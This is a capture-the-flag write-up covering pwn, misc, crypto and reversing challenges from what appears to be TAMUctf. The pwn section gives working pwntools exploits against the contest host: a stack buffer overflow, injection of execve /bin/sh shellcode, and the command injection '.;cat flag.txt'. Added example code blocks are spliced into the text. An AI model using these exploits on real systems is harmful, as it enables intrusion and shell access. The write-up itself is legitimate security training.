
write up by M4ndU (Team WH0a, high school)


Poor English. Sorry.

Pwn


Pwn1

355

nc pwn.tamuctf.com 4321

Difficulty: easy

32bit elf

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [sp+1h] [bp-3Bh]@1
  int v5; // [sp+2Ch] [bp-10h]@1
  int v6; // [sp+30h] [bp-Ch]@1
  int *v7; // [sp+38h] [bp-4h]@1
 
  v7 = &argc;
  setvbuf(stdout, (char *)200);
  v6 = 2;
  v5 = 0;
  puts("Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.");
  puts("What... is your name?");
  fgets(&s, 43, stdin);
  if ( strcmp(&s, "Sir Lancelot of Camelot\n") )
  {
    puts("I don't know that! Auuuuuuuugh!");
    exit(0);
  }
  puts("What... is your quest?");
  fgets(&s, 43, stdin);
  if ( strcmp(&s, "To seek the Holy Grail.\n") )
  {
    puts("I don't know that! Auuuuuuuugh!");
    exit(0);
  }
  puts("What... is my secret?");
  gets(&s);
  if ( v5 == 0xDEA110C8 )
    print_flag();
  else
    puts("I don't know that! Auuuuuuuugh!");
  return 0;
}


If the value of v5 is equal to 0xDEA110C8, we get the flag.

Use the buffer overflow in gets(&s) to overwrite v5.

s is at ebp - 0x3B.
v5 is at ebp - 0x10.

offset: 43 bytes

payload = dummy[43] + v5[4]

exploit

from pwn import *
 
p = remote("pwn.tamuctf.com", 4321)
 
v5 = 0xDEA110C8
 
payload = "A"*43
payload += p32(v5)
 
p.recvline()
p.recvline()
p.sendline("Sir Lancelot of Camelot")
p.recvline()
p.sendline("To seek the Holy Grail.")
p.recvline()
 
p.sendline(payload)
 
p.interactive()


flag : gigem{34sy_CC428ECD75A0D392}



Pwn3

454

nc pwn.tamuctf.com 4323

Difficulty: easy


32bit elf

[*] '/home/mandu/pwn3'
    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments

NX is disabled, but PIE is enabled.

char *echo()
{
  char s; // [sp+Eh] [bp-12Ah]@1
 
  printf("Take this, you might need it on your journey %p!\n", &s);
  return gets(&s);
}

A stack address leak and a buffer overflow.

payload = dummy[0x12A+4] + &shellcode[4] + NOP[40] + shellcode[25]

I tried putting the NOP sled and shellcode in the dummy area, but it didn't work well, so I just moved them after the return address and it worked.

exploit.py

from pwn import *
 
p = remote("pwn.tamuctf.com", 4323)
 
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
 
p.recvuntil('ney ')
buffer = int(p.recvuntil('!')[:-1], 16) #leak
 
payload = "A"*(0x12a+4) #dummy
payload += p32(buffer+0x12a+20)  #ret
payload += "\x90"* 40 #NOP
payload += shellcode
 
p.sendline(payload)
 
p.interactive()


flag: gigem{r3m073_fl46_3x3cu710n}



Pwn4

356

nc pwn.tamuctf.com 4324

Difficulty: medium


32bit elf

int laas()
{
  int result; // eax@2
  char s; // [sp+7h] [bp-21h]@1
 
  puts("ls as a service (laas)(Copyright pending)");
  puts("Enter the arguments you would like to pass to ls:");
  gets(&s);
  if ( strchr(&s, '/') )
    result = puts("No slashes allowed");
  else
    result = run_cmd((int)&s);
  return result;
}

int __cdecl run_cmd(int a1)
{
  char s; // [sp+2h] [bp-26h]@1
 
  snprintf(&s, 0x1Bu, "ls %s", a1);
  printf("Result of %s:\n", &s);
  return system(&s);
}


Only "/" is filtered; ";" is not.
So you can chain more than one command with ";".

ls as a service (laas)(Copyright pending)
Enter the arguments you would like to pass to ls:
.
Result of ls .:
flag.txt
pwn4
ls as a service (laas)(Copyright pending)
Enter the arguments you would like to pass to ls:
.;cat flag.txt
Result of ls .;cat flag.txt:
flag.txt
pwn4
gigem{5y573m_0v3rfl0w}
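The check the transcript just bypassed, next to the allowlist-and-argv replacement a defender would want. This is an added Python example, not the challenge binary or its source; `original_filter_accepts`, `build_ls_argv` and `laas` are names chosen here.

```python
import re
import subprocess

# The original binary's only check is strchr(&s, '/'). Anything else, ';' included,
# reaches system("ls %s") and is parsed by a shell.
def original_filter_accepts(user_input):
    return "/" not in user_input

# Hardened replacement: allowlist the characters ls arguments legitimately need
# and pass them as an argv array, so no shell ever parses the input.
SAFE_TOKEN = re.compile(r"^[A-Za-z0-9._-]+$")

def build_ls_argv(user_input):
    """Return ['ls', arg, ...] for acceptable input, or None to reject it."""
    tokens = user_input.split()
    if not tokens or any(not SAFE_TOKEN.match(t) for t in tokens):
        return None
    return ["ls"] + tokens

def laas(user_input):
    """Hardened 'ls as a service': returns ls output or a rejection message."""
    argv = build_ls_argv(user_input)
    if argv is None:
        return "Rejected argument"
    # No shell=True: ';' can never become a command separator here.
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.stdout
```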


flag : gigem{5y573m_0v3rfl0w}

EZ



MISC


Howdy!


mic check


flag : gigem{H0wdy!}




Who am I?

100

What is the A record for tamuctf.com?
(Not in standard gigem{flag} format)

Difficulty: easy


I used the 'ping' command to find out the A record for tamuctf.com.


[MS cmd]

>ping tamuctf.com

 Ping tamuctf.com [52.33.57.247] 32바이트 데이터 사용: 


flag : 52.33.57.247




Who do I trust?

100

Who issued the certificate to tamuctf.com?
(Not in standard gigem{flag} format)

Difficulty: easy


ssl checker

https://www.sslshopper.com/ssl-checker.html#hostname=tamuctf.com


I could get the SSL issuer.


flag : Let's Encrypt Authority X3




Where am I?

100

What is the name of the city where the server for tamuctf.com is located?

(Not in standard gigem{flag} format)

Difficulty: easy


https://iplocation.com/


52.33.57.247


flag : Boardman



I heard you like files.

428

Bender B. Rodriguez was caught with a flash drive with only a single file on it. We think it may contain valuable information. His area of research is PDF files, so it's strange that this file is a PNG.

Difficulty: easy-medium



There is a PNG end signature at 0x340232.


After it: a base64-encoded string, and a PDF file.



I tried decoding the base64 string,



Nice try, but there is no flag here.

You should check this music video out though, it's pretty cool.

https://www.youtube.com/watch?v=TuJqUvBj4rE


but it was not a flag..



Then I exported the PDF part of the data.


I opened it.


ok... rename .pdf to .zip



I found another PNG file.


Open it with hex viewer.



A PDF file again.





Found a base64 string.
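The steps above carve the appended data out of the PNG by hand with a hex viewer. As an added example (not part of the original writeup), this Python walks the PNG chunk list to find IEND, splits off whatever follows it, and names it by magic bytes; the sample file is constructed here, not the challenge file.

```python
import base64, re, struct, zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
FILE_MAGIC = {b"%PDF-": "pdf", b"PK\x03\x04": "zip", PNG_SIG: "png"}

def png_end_offset(data):
    """Walk the PNG chunk list; return the offset just past IEND's CRC, or None."""
    if not data.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4  # chunk header + data + CRC
        if ctype == b"IEND":
            return pos
    return None

def identify(blob):
    """Name the format by its magic bytes; a pure base64 blob is reported too."""
    for magic, name in FILE_MAGIC.items():
        if blob.startswith(magic):
            return name
    return "base64" if re.fullmatch(rb"[A-Za-z0-9+/=\s]+", blob) else "unknown"

def decode_note(text):
    """Decode the base64 text found after IEND (the 'Nice try' note in this challenge)."""
    return base64.b64decode(text)

def carve(data):
    """Return (iend_offset, text before the embedded file, embedded file) or None."""
    end = png_end_offset(data)
    if end is None:
        return None
    trailer = data[end:]
    m = re.search(b"|".join(re.escape(k) for k in FILE_MAGIC), trailer)
    if m is None:
        return end, trailer.strip(), b""
    return end, trailer[:m.start()].strip(), trailer[m.start():]

# Constructed sample (not the challenge file): minimal PNG, a base64 note, then a PDF stub.
def _chunk(ctype, payload):
    crc = struct.pack(">I", zlib.crc32(ctype + payload))
    return struct.pack(">I", len(payload)) + ctype + payload + crc

SAMPLE = (PNG_SIG + _chunk(b"IHDR", b"\x00" * 13) + _chunk(b"IEND", b"")
          + base64.b64encode(b"Nice try, but there is no flag here.")
          + b"\n%PDF-1.4\n%%EOF\n")
```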


flag : flag{P0lYt@r_D0_y0u_G3t_It_N0w?}





MicroServices



0_intrusion

100


Welcome to MicroServices inc, where we do all things micro and service oriented!
Recently we got an alert saying there was suspicious traffic on one of our web servers. Can you help us out?

  1. What is the IP Address of the attacker?



open with wireshark.


Sorting the packets by length, 10.91.9.93 sent many TCP packets to the server.


So the attacker's IP is 10.91.9.93.


flag : 10.91.9.93




Crypto


-.-

244

To 1337-H4X0R:

Our coworker Bob loves a good classical cipher. Unfortunately, he also loves to send everything encrypted with these ciphers. Can you go ahead and decrypt this for me?

Difficulty: easy


dah-dah-dah-dah-dah dah-di-di-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dit dah-di-di-di-dit dah-di-dit di-di-di-di-dah dah-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dah-dah di-dah dah-dah-di-di-dit di-di-di-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit di-dah di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dah-dah di-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah dah-di-di-di-dit di-di-di-di-dah di-dah dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-dah dah-di-di-di-dit dah-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dit di-di-di-di-dah dit di-di-di-dah-dah dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-dah-dit di-di-di-di-dit di-di-di-di-dah 
di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah di-di-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-dah di-di-di-di-dah dah-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-dah-dit di-di-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dah dah-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit dah-di-dit dah-dah-di-di-dit dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-dah-dah-dah dah-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dit di-di-di-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dit 
dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-dah-dah di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-dah dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dit di-di-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah dah-dah-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-dah di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-dah-dah-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit di-di-dah-dah-dah 
dah-dah-di-di-dit di-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit di-dah di-di-dah-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dah di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dah dit di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-di-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dit di-dah di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-dah di-di-di-dah-dah di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-dah-dah dah-dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah dah-dah-dah-dah-dit


Since each group consists of 4 or 5 elements, they must be Morse code. The title of this task is also - . -


Replace:

dah ------> _

di, dit ---> .

- ------> (remove it, so each word becomes one Morse symbol)


and decode it!


0X57702A6C58744751386538716E6D4D59552A737646486B6A49742A5251264A705A766A6D2125254B446B6670235E4E39666B346455346C423372546F5430505A516D4351454B5942345A4D762A21466B386C25626A716C504D6649476D612525467A4720676967656D7B433169634B5F636C31434B2D7930755F683476335F6D3449317D20757634767A4B5A7434796F6D694453684C6D385145466E5574774A404E754F59665826387540476E213125547176305663527A56216A217675757038426A644E49714535772324255634555A4F595A327A37543235743726784C40574F373431305149


Oh, it's a hex value.


Hex to string: https://codebeautify.org/hex-string-converter


Wp*lXtGQ8e8qnmMYU*svFHkjIt*RQ&JpZvjm!%%KDkfp#^N9fk4dU4lB3rToT0PZQmCQEKYB4ZMv*!Fk8l%bjqlPMfIGma%%FzG gigem{C1icK_cl1CK-y0u_h4v3_m4I1} uv4vzKZt4yomiDShLm8QEFnUtwJ@NuOYfX&8u@Gn!1%Tqv0VcRzV!j!vuup8BjdNIqE5w#$%V4UZOYZ2z7T25t7&xL@WO7410QI
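The replace-and-decode steps above, as an added Python example that is not part of the original writeup: spoken Morse (dah/di/dit) to hex digits to ASCII, plus the inverse direction for round-trip checking. SAMPLE is the first ten symbols of the challenge ciphertext.

```python
# Morse table for hex digits, plus X for the "0X" prefix the ciphertext carries.
MORSE = {
    "0": "-----", "1": ".----", "2": "..---", "3": "...--", "4": "....-",
    "5": ".....", "6": "-....", "7": "--...", "8": "---..", "9": "----.",
    "A": ".-", "B": "-...", "C": "-.-.", "D": "-..", "E": ".", "F": "..-.",
    "X": "-..-",
}
MORSE_INV = {v: k for k, v in MORSE.items()}
SYLLABLE = {"dah": "-", "di": ".", "dit": "."}

def spoken_to_morse(text):
    """'dah-di-dit dah' -> ['-..', '-']: one space-separated word per symbol."""
    return ["".join(SYLLABLE[s] for s in word.split("-")) for word in text.split()]

def decode(text):
    """Spoken Morse -> hex string -> ASCII, the pipeline used in the writeup."""
    hexstr = "".join(MORSE_INV[sym] for sym in spoken_to_morse(text))
    if hexstr.startswith("0X"):
        hexstr = hexstr[2:]
    return bytes.fromhex(hexstr).decode("ascii")

def encode(plain):
    """Inverse direction in the same spoken notation ('dit' marks a final dot)."""
    def spoken(symbol):
        last = len(symbol) - 1
        return "-".join("dah" if c == "-" else ("dit" if i == last else "di")
                        for i, c in enumerate(symbol))
    hexstr = "0X" + plain.encode("ascii").hex().upper()
    return " ".join(spoken(MORSE[ch]) for ch in hexstr)

# First ten symbols of the challenge ciphertext: "0X57702A6C", i.e. "Wp*l".
SAMPLE = ("dah-dah-dah-dah-dah dah-di-di-dah di-di-di-di-dit dah-dah-di-di-dit "
          "dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-dah "
          "dah-di-di-di-dit dah-di-dah-dit")
```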



flag : gigem{C1icK_cl1CK-y0u_h4v3_m4I1}




Reversing


Cheesy

100

easy

Where will you find the flag?


int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rdx@1
  __int64 v4; // rdx@1
  __int64 v5; // rdx@1
  __int64 v6; // rdx@1
  __int64 v7; // rdx@1
  __int64 v8; // rdx@1
  int result; // eax@1
  __int64 v10; // rcx@1
  char v11; // [sp+Fh] [bp-41h]@1
  char v12; // [sp+10h] [bp-40h]@1
  __int64 v13; // [sp+38h] [bp-18h]@1
 
  v13 = *MK_FP(__FS__, 40LL);
  std::operator<<<std::char_traits<char>>(&std::cout, "QUFBQUFBQUFBQUFBQUFBQQ==\n", envp);
  std::operator<<<std::char_traits<char>>(&std::cout, "Hello! I bet you are looking for the flag..\n", v3);
  std::operator<<<std::char_traits<char>>(
    &std::cout,
    "I really like basic encoding.. can you tell what kind I used??\n",
    v4);
  std::operator<<<std::char_traits<char>>(&std::cout, "RkxBR2ZsYWdGTEFHZmxhZ0ZMQUdmbGFn\n", v5);
  std::operator<<<std::char_traits<char>>(&std::cout, "Q2FuIHlvdSByZWNvZ25pemUgYmFzZTY0Pz8=\n", v6);
  std::operator<<<std::char_traits<char>>(&std::cout, "RkxBR2ZsYWdGTEFHZmxhZ0ZMQUdmbGFn\n", v7);
  std::allocator<char>::allocator(&v11);
  std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string(
    &v12,
    "Z2lnZW17M2E1eV9SM3YzcjUxTjYhfQ==\n",
    &v11);
  std::allocator<char>::~allocator(&v11);
  std::operator<<<std::char_traits<char>>(&std::cout, "WW91IGp1c3QgbWlzc2VkIHRoZSBmbGFn\n", v8);
  std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string(&v12);
  result = 0;
  v10 = *MK_FP(__FS__, 40LL) ^ v13;
  return result;
}



Decode the string passed to basic_string (the one the program builds but never prints): Z2lnZW17M2E1eV9SM3YzcjUxTjYhfQ==


flag : gigem{3a5y_R3v3r51N6!}




Snakes over cheese

191

easy

What kind of file is this?


Decompile the .pyc file with https://python-decompiler.com/


from datetime import datetime
Fqaa = [102, 108, 97, 103, 123, 100, 101, 99, 111, 109, 112, 105, 108, 101, 125]
XidT = [83, 117, 112, 101, 114, 83, 101, 99, 114, 101, 116, 75, 101, 121]
 
def main():
    print 'Clock.exe'
    input = raw_input('>: ').strip()
    kUIl = ''
    for i in XidT:
        kUIl += chr(i)
 
    if input == kUIl:
        alYe = ''
        for i in Fqaa:
            alYe += chr(i)
 
        print alYe
    else:
        print datetime.now()
 
 
if __name__ == '__main__':
    main()



Good


I thought alYe was the flag, because this program prints alYe when the input is equal to kUIl.


Convert Fqaa to ASCII.


flag : flag{decompile}
